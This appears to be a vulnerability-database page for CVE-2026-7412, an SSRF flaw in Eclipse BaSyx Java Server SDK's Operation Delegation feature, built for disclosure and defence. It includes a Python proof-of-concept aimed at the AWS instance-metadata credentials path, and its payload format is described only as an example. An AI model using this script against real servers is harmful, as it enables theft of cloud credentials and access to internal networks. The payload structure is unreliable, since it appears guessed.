Security Vulnerability Report
CVE-2026-7412 CVSS 8.6 HIGH

CVE-2026-7412

Published: 2026-05-05 16:16:18
Last Modified: 2026-05-06 16:16:13

Description

In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS).

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-7412 PoC Generator
# Target: Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10
# Description: Exploits the Operation Delegation feature to force a blind HTTP POST to an arbitrary URI.

def exploit_ssrf(target_url, malicious_uri):
    """
    Sends a malicious request to the vulnerable BaSyx server
    to force a POST request to the malicious_uri.
    """
    # Example payload structure based on Operation Delegation
    payload = {
        "operation": "delegate",
        "destination": malicious_uri,
        "method": "POST"
    }
    try:
        print(f"[*] Sending SSRF payload to {target_url}")
        print(f"[*] Forcing server to POST to: {malicious_uri}")
        response = requests.post(target_url, json=payload, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if the internal server received the request.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Example: Attacker tries to hit the AWS IMDSv1 (if not protected) or an internal admin panel
    target = "http://vulnerable-basyx-server:8080/api/operation"
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

References

https://gitlab.eclipse.org/security/cve-assignment/-/issues/103
https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423

Weakness: CWE-918 (Server-Side Request Forgery)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7412", "sourceIdentifier": "[email protected]", "published": "2026-05-05T16:16:18.480", "lastModified": "2026-05-06T16:16:12.510", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/103", "source": "[email protected]"}, {"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423", "source": "[email protected]"}, {"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}